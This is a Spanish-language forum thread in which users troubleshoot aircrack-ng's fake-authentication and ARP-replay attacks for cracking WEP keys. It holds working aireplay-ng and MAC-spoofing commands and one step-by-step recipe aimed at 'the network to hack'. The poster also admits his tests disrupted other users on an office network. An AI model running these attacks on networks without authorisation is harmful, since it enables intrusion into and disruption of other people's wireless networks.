|
Título: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Casidiablo en 16 Enero 2009, 15:29 pm Hola a todos... creo que nunca había posteado en esta sección, así que espero hacerlo bien.
La cosa es la siguiente. Estoy estudiando acerca de las vulnerabilidades de las claves WEP, por lo que estoy jugando con mi AP. Lo que he podido hacer Si pongo mi tarjeta en modo monitor, y capturo paquetes con el airodump-ng mientras esté usando la red con otro equipo (descargando un archivo pesado), se generan los suficientes IVs como para descifrar la clave WEP. Esto no tiene ningún misterio, y ni siquiera necesito la inyección. Para el siguiente ejercicio, quería intentar obtener la clave mientras la red no estuviera en uso, o tuviera muy poco. Para ello, fue necesario recompilar los drivers de mi tarjeta siguiendo estos pasos: http://casidiablo.net/compilar-drivers-iwlagn-inyeccion-trafico-cracking-wep/ para habilitar la inyección de paquetes. Y aquí vienen los problemas... Lo que NO he podido hacer Pongo la tarjeta en modo monitor, y luego abro una sesión con el airodump para capturar los paquetes. Luego hago un test de inyección, y todo parece funcionar: (http://img413.imageshack.us/img413/7158/aireplayairodumpgv7.png) Pero cuando deseo hacer un fake authentication (aireplay-ng -1 0 -e NUMICOM -a XXXXXXXXXX -h 00:21:5c:06:35:73 wlan0), me aparece el típico error: Código: Attack was unsuccessful. Possible reasons: Veamos... * Perhaps MAC address filtering is enabled. Es mi AP, y la configuración es esta: (http://img413.imageshack.us/img413/6748/macfilteriz6.png) * Check that the BSSID (-a option) is correct. El BSSID es correcto * Try to change the number of packets (-o option). ??? * The driver/card doesn't support injection. los tests dicen que sí. * This attack sometimes fails against some APs. le intenté con otro, y lo mismo. * The card is not on the same channel as the AP. están en el canal 6. El router lo tengo en el canal 6 y la tarjeta también (2.437 GHz). * You're too far from the AP. Get closer, or lower the transmit rate. Está en el cuarto de al lado. ¿Alguien podría decirme qué más puedo hacer? He intentado además Des-autenticar a uno de los clientes conectados. Según la teoría, el cliente debería desconectarse y en la reconexión le capturo los IVs. Pero no :P no captura nada, y encima de todo el cliente ya no se puede conectar normalmente; me toca reiniciar el AP y luego de ello el cliente puede volver a conectarse. El caso es que intenté no venir a pedir ayuda, pero dado que llevo dos días y no he podido, pues me rindo. Un saludo, y gracias por leer. Datos adicionales Uso Gentoo Linux con kernel 2.6.27. Los drivers son los últimos (compat-wireless-2009-01-12), y le aplique correctamente los parches para habilitar la inyección. Mi AP es un Linksys WRT54GS. La versión del aircrack es 1.0 rc1. Al ejecutar lsmod: Código: Module Size Used by El lspci de mi tarjeta: Código: 02:00.0 Network controller: Intel Corporation Device 4229 (rev 61) Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: fuenteRea en 16 Enero 2009, 15:36 pm Importante, dinos la distancia al router, hay veces que falla si estas demasiado cerca, tambien en aireplay-ng -1 0 -e NUMICOM -a XXXXXXXXXX -h 00:21:5c:06:35:73 wlan0 donde pone 0 cambialo por 30, es decir que en vez de automatico lo haga cada 30 segundos que creo que es el tiempo que por lo general el router necesita saber algo de ti.
Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Casidiablo en 16 Enero 2009, 15:49 pm La distancia es de unos 6 metros. Puede que lo que vaya a decir sea tonto pero bueno... yo me puedo conectar normalmente desde mi escritorio (con la clave, obviamente), ¿no debería funcionar igual? es decir ¿afecta tanto la distancia?
Por otro lado, y ahora que lo pienso, no coloqué la salida completa del intento de asociación: Código: 08:56:27 Sending Authentication Request (Open System) Fíjense como dice: AP rejects the source MAC address (00:21:5C:06:35:73) ?, lo cual me parece raro puesto que, como les comenté, no tengo habilitado ningún filtro de MACs. Además, si lo tuviera, ¿no me impediría conectarme cuando le pongo la clave WEP? Como les digo, cuando estoy trabajando en cosas normales me conecto con este mismo PC. Un saludo, y gracias por la respuesta. Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: fuenteRea en 16 Enero 2009, 17:04 pm prueba poniendote de mac la del ap haber si asi hay suerte, un saludo!
Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: k-k0 en 16 Enero 2009, 17:13 pm thedoctor77 , EXACTAMENTE... es para ver que error escupe, tambien mira si guarda logs y que tiene ahi dentro el router, una vez , me volvi loco tratando de autenticarme en un router sin filtro de macs, sin una *****... simplemente no funciono, es el dia de hoy que me intriga ...
Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Casidiablo en 16 Enero 2009, 17:53 pm Si pongo la misma la cosa cambia un poco, pero nunca termina de correr el comando:
Código: aireplay-ng -1 0 -e NUMICOM -a BLABLA -h BLABLA wlan0 se queda mucho tiempo, y nunca aparece nada como Association successful :-) Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: k-k0 en 16 Enero 2009, 18:00 pm probaste con :
ifconfig interface down ifconfig interface hw ether la_mac_falsa ifconfig interface up Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Casidiablo en 16 Enero 2009, 18:12 pm Intenté esto:
* Me cambié la MAC por la MAC del AP (con el comando macchanger) * Ejecuto el aireplay-ng para realizar el fake (aireplay-ng -1 0 -e NUMICOM -a MAC_AP -h MAC_AP wlan0) Pero sucede lo mismo, se queda repitiendo Sending Authentication Request (Open System), Authentication successful y Sending Association Request, pero nunca me dice Association successful :-) Gracias por su ayuda. Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: heaviloto en 16 Enero 2009, 18:32 pm hola,
Si pongo la misma la cosa cambia un poco, pero nunca termina de correr el comando: Código: aireplay-ng -1 0 -e NUMICOM -a BLABLA -h BLABLA wlan0 se queda mucho tiempo, y nunca aparece nada como Association successful :-) has probado a hacerle el A1, despues de esto, a mi e una ocasion, me funciono y me dio la la clave, creo que aunque no salga, Association successful :-), nos dice, Sending Authentication Request (Open System), osea que sistema abiero no?, pero fuere como fuere, me dio la clave un saludo Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Casidiablo en 16 Enero 2009, 19:24 pm Mira que soy bruto... ¿qué significa A1?
Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Carloswaldo en 16 Enero 2009, 19:28 pm A1 es el Ataque 1 (Asociación falsa).
Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Casidiablo en 16 Enero 2009, 20:08 pm ¿Y no es eso lo que estoy tratando de hacer? O sea, la opción -1 del comando aireplay-ng...
Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: heaviloto en 16 Enero 2009, 20:50 pm hola, perdon me e colado, es que con eso de A1 y A3 me lio un poco, xd xd xd xd, queria decir esto exactamente,
- aireplay-ng -3 -b (bssid del AP) -h (bessid del que este conectado) wlan0 prueba a poner eso despues de intentar asociarte un saludo Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Casidiablo en 16 Enero 2009, 21:46 pm Muestra esto, y solo esto:
Código: Read 83454 packets (got 0 ARP requests and 0 ACKs), sent 0 packets... Van aumentando el número de paquetes pero no los ARP ni ACK... Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Casidiablo en 16 Enero 2009, 21:50 pm Si hago todo usando la MAC del AP, me sale esto:
Código: aireplay-ng -3 -b 00:1C:10:08:39:15 -h 00:1C:10:08:39:15 wlan0 Bueno, siempre y cuando en otra consola tenga corriendo el ataque 1... cada vez que en el fake auth aparece esto: Sending Authentication Request (Open System) [ACK], el número de ACKs crece en el ataque 3 (tiene sentido). Pero aún así, no he podido hacer nada. Muchas gracias por su ayuda. Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: heaviloto en 16 Enero 2009, 22:05 pm hola, te suben los datas en el airodump?, si es asi, un poco de paciencia, no siempre es a la preimera, y segun el estado de animo del router, xd xd xd xd xd
un saludo Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: fuenteRea en 17 Enero 2009, 04:11 am bajale la rate a la tarjeta ifconfig rate 1M, si tienes un portatil prueba a cambiarte de sitio o apaga y enciende el router porque algunas veces son muy cabezones estos router, un saludo!!
PD: haz el ataque1 de esta manera--> aircrack-ng -1 30 -a BSSID -e ESSID -h BSSID wlan0 Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Spanslus9mm en 17 Enero 2009, 11:25 am Buenas, te voy a decir como lo veo yo:
- No se seguro si lo estas haciendo, pero es importante cambiarte la MAC de tu tarjeta (pero no a la del AP) y usar esa misma MAC falseada en la opción -h. -Con el 0 le estas diciendo que se intente reautentificar continuamente. Dependiendo del modelo de router esto no puede ser adecuado, prueba otros valores como 30 o 20 (se reautentifica cada 30 o 20 segundos) -Bajar el rate a 1M como dice thedoctor77 Código: iwconfig wlan0 rate 1M -Puedes probar a añadir la opción -o 1 (Envía solo un tipo de paquetes de cada vez. Por defecto está fijado en múltiples y esto puede confundir a algunos APs) -Y para terminar hay algunos routers preparados para no responder a este ataque, si pruebas todo lo que te han sugerido y no logras nada quizá no lo puedas hacer. Saludos ;) Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Lapiz_tola en 18 Enero 2009, 18:08 pm hola yo tengo el programa backtrack 3y mi tarjeta de red es atheros y tengo los pasos a seguir de ese programa y si funciona perfectamente es pero que te sirva de algo PARA CAMBIAR A MODO MONITOR
primera terminal modprobe -r ath_pci modprobe ath_pci autocreate=monitor iwconfig (ath1 es mi trjeta de red) mode monitor airodump-ng (ath1 es mi tarjeta de red) iwconfig (ath1 es mi tarjeta de red) rate 1M channel (el de la red a hackear) ifconfig (ath1 es mi tarjeta de red) hw ether 00:11:22:33:44:55 airodump-ng --ivs --bssid (mac-de la que vas a hackear ) -w (cualquier nombre del archivo) -c (canal de la red) (ath1 es mi tarjeta de red) segunda terminal aireplay-ng -1 6 -e (nombre de la red) -a (mac-de la que vas a hackear) -h 00:11:22:33:44:55 (ath1 es mi tarjeta de red) tercera terminal aireplay-ng -3 -b (mac-de la que vas a hackear) -h 00:11:22:33:44:55 (ath1 es mi tarjeta de red) para sair de las terminales es ctrl:c para recuperar la clave en la primera terminal le pones aircrack-ng (nombre del archivo)-01.ivs los datos que vienen entre parentesis son los que tienes que cambiar ya cambiados no le pongas los( ) espero y te sirva saludos Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: fuenteRea en 18 Enero 2009, 18:15 pm Lapiz_tola que dices?, ese no es el problema, leete bien el hilo y no varies el problema, un saludo!!
Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Lapiz_tola en 18 Enero 2009, 18:18 pm tienes un problema con este comando
aireplay-ng -1 6 -e (nombre de la red) -a (mac-de la que vas a hackear) -h 00:11:22:33:44:55 (ath1 es mi tarjeta de red) Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Lapiz_tola en 18 Enero 2009, 18:22 pm tu le pones
aireplay-ng -1 0 -e NUMICOM -a BLABLA -h BLABLA wlan0 Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Lapiz_tola en 18 Enero 2009, 18:25 pm intentale tio y cambia esa actitud
Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: fuenteRea en 18 Enero 2009, 18:25 pm haber yo no tengo problema, el el problema que tiene es otro, y el 0 es la peor solucion, ya se le ha dicho que pruebe con 20 o 30, un saludo!!
PD: Lee el hilo y no postees doble por favor Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Lapiz_tola en 18 Enero 2009, 18:31 pm el tiene que probar con
aireplay-ng -1 6 -e (nombre de la red) -a (mac-de la que vas a hackear) -h 00:11:22:33:44:55 (ath1 es mi tarjeta de red) a mi si me funciona y aparece :) Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: fuenteRea en 18 Enero 2009, 18:35 pm vamos a ver el numero 6 tu le has puesto un 6 pero lo normal es ponerle un 20 o 30 que es lo que por lo general tarda el router en desasociarte por favor lee arriba lo explican, un 6 no creo que sea el numero mas adecuado, pero por probar puede probar hasta con 23 con 4 con 5 etc, un saludo!
Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Casidiablo en 19 Enero 2009, 17:55 pm Me funcionó por unos segundos... luego de poner el rate a 1M, y hacer otras cosas, el comando me devolvió:
Código: 18:22:32 Sending Authentication Request ... pero la felicidad fue instantánea; luego salió el mensaje que dice que el ataque no fue satisfactorio. Ahora, le he intentado de mil maneras de nuevo, pero sencillamente no funciona. Si no le molesta a nadie, me gustaría hacerles unas preguntas: * Porqué poner el rate en 1M? * Cómo debería correr los comandos? con el wlan0? o con el mon0 que crea el airmon-ng? de momento sé que con el mon0 funciona la inyección, mientras que con wlan0 no? aún así no tengo claro esa parte, y pues da igual si logro hacer todo bien si no entiendo lo que hice :P Gracias a todos por las respuestas. Un saludo. Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: heaviloto en 19 Enero 2009, 21:29 pm hola, solo me queda decirte, que una vez este asociado para la consola, y en otra si es que los datas estan perezosos pones;
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ( bssid del AP) -h (nuestra bssid o conectada ) wlan0 lo unico que con este ataque, necesitaras 250.000 arps, y utilizar el aircrack, sin el -ptw , a veces este ataque es efectivo, como te digo, si los datas suben lentos suerte y un saludo Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: fuenteRea en 19 Enero 2009, 23:17 pm mira casidiablo aqui tienes un muy buen manual http://foro.elhacker.net/wireless_en_linux/guia_completa_aircrackng-t231434.0.html
si tienes alguna duda pues ya sabes. De todas maneras yo probaria lo siguiente: 1.- Ponte la MAC del AP 2.- bajar la rate, creo que se hace para transmitir en otro modo, pero a esto no me hagas caso, eso si bajala. 3.- Haz un A1 4.- Haz un A3 enviando pocos paquetes y a esperar 4b.- si no funciona pues haz lo que te dice heavipiloto 4c.- En el caso en el que consigas unos cuantos paquetes haz un chopchop OJO: si estas cerca del router alejate un poco PD: Oye heavypiloto, porque si no se asocia con un A2 funcionaria?¿No se supone que no conecta al router? Un saludo!! Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: heaviloto en 20 Enero 2009, 00:28 am hola, yo no e dicho que si no se asocia funcione, yo digo que una vez se asocie, como a dicho que ha hecho en una ocasion,
Citar Me funcionó por unos segundos... luego de poner el rate a 1M, y hacer otras cosas, el comando me devolvió: Código: 18:22:32 Sending Authentication Request 18:22:32 Authentication successful 18:22:32 Sending Association Request 18:22:32 Association successful :-) 18:22:42 Sending keep-alive packet 18:22:52 Sending keep-alive packet que pare la consola, por que aunque la pare sigue asociado con un poco de suerte, y ejecute el comando que le e puesto, en otra consola un saludo PD: thedoctor77 , es heaviloto, no heavipiloto Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: fuenteRea en 20 Enero 2009, 08:27 am PD: thedoctor77 , es heaviloto, no heavipiloto jaja, vale, pues gracias y un saludo!!.Casidiablo dinos algo!! Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Novatilla en Apuros en 4 Febrero 2009, 10:13 am Me pasa exactamente lo mismo que a ti,Casidiablo,mira mi captura.
Me da todo bien,Inyeccion y todo,pero no me da nada de Data,ni ARP. Tengo la tarjeta intel pro Wireless ,iwl3945 y le cambio el modulo a ipwraw,se me pone en modo monitor,pero no me da nada,,asi la tenga toda la noche,jaja.. http://img5.imageshack.us/img5/581/paracasidiablohd7.png (http://img5.imageshack.us/img5/581/paracasidiablohd7.png) Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: ChimoC en 4 Febrero 2009, 10:27 am Buenas:
Os paso un copy/paste de la página de aircrack aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 Donde: * -1 significa falsa autenticación * 0 tiempo de reasociación en segundos * -e teddy es el nombre de la red wireless * -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso * -h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta * ath0 es el nombre de la interface wireless U otra variación útil para algunos puntos de acceso: aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 Donde: * 6000 - Reautentifica cada 6000 segundos. El largo periodo también provoca que se envien paquetes de “sigo aquí” o “keep alive”. * -o 1 - Enviar solo un tipo de paquetes de cada vez. Por defecto está fijado en múltiples y esto puede confundir a algunos APs. * -q 10 - Envia paquetes de “sigo aquí” cada 10 segundos. Ejemplos de uso La falta de asociación con el punto de acceso es la razón más habitual por la cual falla la inyección. Para asociarse con un punto de acceso, usa la falsa autenticación: aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 Donde: * -1 significa falsa autenticación * 0 tiempo de reasociación en segundos * -e teddy es el nombre de la red wireless * -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso * -h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta * ath0 es el nombre de la interface wireless Si tienes éxito verás algo como esto: 18:18:20 Sending Authentication Request 18:18:20 Authentication successful 18:18:20 Sending Association Request 18:18:20 Association successful :-) U otra variación útil para algunos puntos de acceso: aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 Donde: * 6000 - Reautentifica cada 6000 segundos. El largo periodo también provoca que se envien paquetes de “sigo aquí” o “keep alive”. * -o 1 - Enviar solo un tipo de paquetes de cada vez. Por defecto está fijado en múltiples y esto confunde a algunos APs. * -q 10 - Enviar paquetes de “sigo aquí” cada 10 segundos. Si tienes éxito verás algo como esto: 18:22:32 Sending Authentication Request 18:22:32 Authentication successful 18:22:32 Sending Association Request 18:22:32 Association successful :-) 18:22:42 Sending keep-alive packet 18:22:52 Sending keep-alive packet # etc... Identificando autenticaciones fallidas A continuación se puede ver un ejemplo de una autenticación fallida: 8:28:02 Sending Authentication Request 18:28:02 Authentication successful 18:28:02 Sending Association Request 18:28:02 Association successful :-) 18:28:02 Got a deauthentication packet! 18:28:05 Sending Authentication Request 18:28:05 Authentication successful 18:28:05 Sending Association Request 18:28:10 Sending Authentication Request 18:28:10 Authentication successful 18:28:10 Sending Association Request Presta atención a la frase “Got a deauthentication packet” y los continuos reintentos. No realices otros ataques hasta que consigas efectuar la falsa autenticación de forma correcta. Otra forma de identificar que la falsa autenticación falla es ejecutar tcpdump y mirar los paquetes. Inicia otra consola o shell mientras estás inyectando y… Escribe: “tcpdump -n -e -s0 -vvv -i ath0” Aquí puedes ver un mensaje de error de tcpdump como el que estás buscando: 11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0f:b5:46:11:19 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station Date cuenta de que el punto de acceso (00:14:6c:7e:40:80) le está diciendo al cliente origen (00:0f:b5:46:11:19) que no está asociado. Lo que significa, que el AP no aceptará los paquetes inyectados. Si quieres seleccionar solo los paquetes de DeAutenticación con tcpdump, puedes usar: “tcpdump -n -e -s0 -vvv -i ath0 | grep DeAuth”. Necesitas utilizar la palabra “DeAuth” para encontrar exactamente los paquetes que buscas. Mira las siguientes secciones para posibles soluciones. Reasociación Algunas veces nos desasociamos del AP de forma periódica. Algunos puntos de acceso requieren que nos reasociaciemos cada 30 segundos, o sino considera que el falso cliente se ha desconectado. En este caso, es necesario fijar el periodo de re-asociación: aireplay-ng -1 30 -e 'el ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0 Un saludo ChimoC Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Novatilla en Apuros en 4 Febrero 2009, 12:10 pm Ya,,pero si te fijas por ejemplo en mi captura,todo parece funcionar,,la asociacion,la inyeccion..todo,,pero sigue sin dar Data ni me da ARP.
En fin,,probaré los comando que pones a ver si me funcionara. Un saludo! Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: ChimoC en 4 Febrero 2009, 15:08 pm Buenas:
No poongas aireplay-ng -1 0 ... pon aireplay-ng -1 10 .. Un saludo ChimoC P.D.: Y no inyectas porque un A1+A3 no siempre inyecta... prueba con otro ataque EDITO: El A1+A3 a vecse tarda mucho en funcionar (y otras no funciona) probar un A1+A4... A1+A5 Y por favor...si el problema no es el mismo que el del otro compañero... abrid un nuevo post Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Casidiablo en 4 Febrero 2009, 15:33 pm Yo tuve que dejar todo para después... el router que estaba usando era mio pero es de "mi oficina de trabajo" y al parecer mis "ataques" se convertían en un DoS para los otros clientes. Ni modos :P
Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: ChimoC en 4 Febrero 2009, 16:03 pm Buenas:
Casidiablo... tu tarjeta es una ipw4965 ? Trata de hacer el A1 por medio de wpa_supplicant Te cito de Dexter Back La asociación pues, debemos realizar con wpa_supplicant de la siguiente manera: - Primero debemos crear un fichero con la siguiente estructura: Código: network={ ssid="ESSID" key_mgmt=NONE bssid=BSSID wep_key0="232323343478787" } Rellenamos los campos de ESSID y BSSID con los datos de nuestra red wifi. El campo de wep_key no hace falta cambiarlo, pues es una clave cualquiera. Después lanzamos en consola: Código: sudo wpa_supplicant -c/home/dexterback/wpa.conf -Dwext -iwlan0 /home/dexterback/wpa.conf no hace falta decir que es la ruta... pero fijaros que el "-c" va "enganchado", no es ningún error. Os saldrá un mensaje diciendo que se ha conectado al BSSID, importante no cerrar esta consola, ya que si se cierra se pierde la asociación. Después ya hay que hacer los pasos típicos... y lanzar el ataque que uno quiera. A mi de esta manera me funciona 100%, me inyecta alrededor de los 400pps, y en 3min o asi se consigue la key. Espero que sirva de ayuda a la gente, y sobre todo tener en cuenta que la ASOCIACIÓN NO FUNCIONA CON AIREPLAY-NG, hay que realizarla con wpa_supplicant. Un saludo ChimoC P.D.: El A1 no te debería funcionar como una denegación de servicio.... eso sería un A0 .... que cosa más rara.... prueba con wpa_supplicant Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Casidiablo en 4 Febrero 2009, 16:13 pm Sep, mi tarjeta es ipw4965. Ahora me surge una duda, y espero que no sea tan estúpida... si los que estoy auditando es una red con WEP, igual uso el wpa_supplicant? Es que eso me suena a WPA :-\
Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: ChimoC en 4 Febrero 2009, 16:46 pm Buenas:
NO tengo tu tarjeta..... En principio llevas razón en cuanto al wpa_supplicant No obstante unicamente lo usas para asociarte. Yo sólo te digo lo que he leido por ahí y han dicho que funciona...no he podido usarlo porque mi portatil es del año de los trogloditas >:D Y ya que te gusta probar cosas.... prueba y comenta resultados ;D Un saludete ChimoC P.D.: En principio si fuera cualquier otra tarjeta para la asociación falsa (A1) usarías el aireplay-ng -1 ... pero por lo visto para esta tarjeta se debe usar el wpa_supplicant Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: Casidiablo en 4 Febrero 2009, 16:48 pm OK, voy a intentarlo... pero entonces le dejo los drivers que parché, verdad?
Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: ChimoC en 4 Febrero 2009, 22:07 pm Buenas:
Claro..sino no podrás inyectar.... Un saludo ChimoC Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: kalamidadsoy en 6 Julio 2009, 13:59 pm hola chicos ami me pasa lo mismo no asocia
yo tengo el wifyway 1.0 en usb la movida es que quiero probar el maldito supllicant paro no lo hago bien que komando debo poner ,por que los que he mirado por la red no me valen me dice que no encuentar el archivo el archivo vpa.conf lo dejo en el ecritorio alguien me puede ayudar con el comando? saludos Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: plagamendez en 19 Diciembre 2012, 01:52 am hola a todos,les cuento;estoy intentando darle a un ap con wpa usando reaver,y como ya han comentado aca en principio la inyeccion funciona a full pero cuando intento autenticarme ya no funciona nada,es la primera vez que me sucede.En fin,hay alguna forma de forzar la autenticacion?Espero alguien me ayude,y gracias de antemano
Título: Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) Publicado por: zydas en 19 Diciembre 2012, 21:16 pm Amigo plagamendez revivir un post del 2009 que no tiene nada que ver con reaver manda cojones :silbar:
Saludos |